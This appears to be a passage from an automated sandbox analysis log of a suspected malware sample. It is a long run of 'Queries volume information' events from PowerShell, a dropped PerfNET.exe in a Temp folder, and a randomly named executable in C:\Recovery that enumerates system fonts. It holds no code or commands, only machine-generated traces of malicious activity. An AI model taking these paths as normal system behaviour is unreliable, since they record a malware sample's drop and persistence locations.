Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
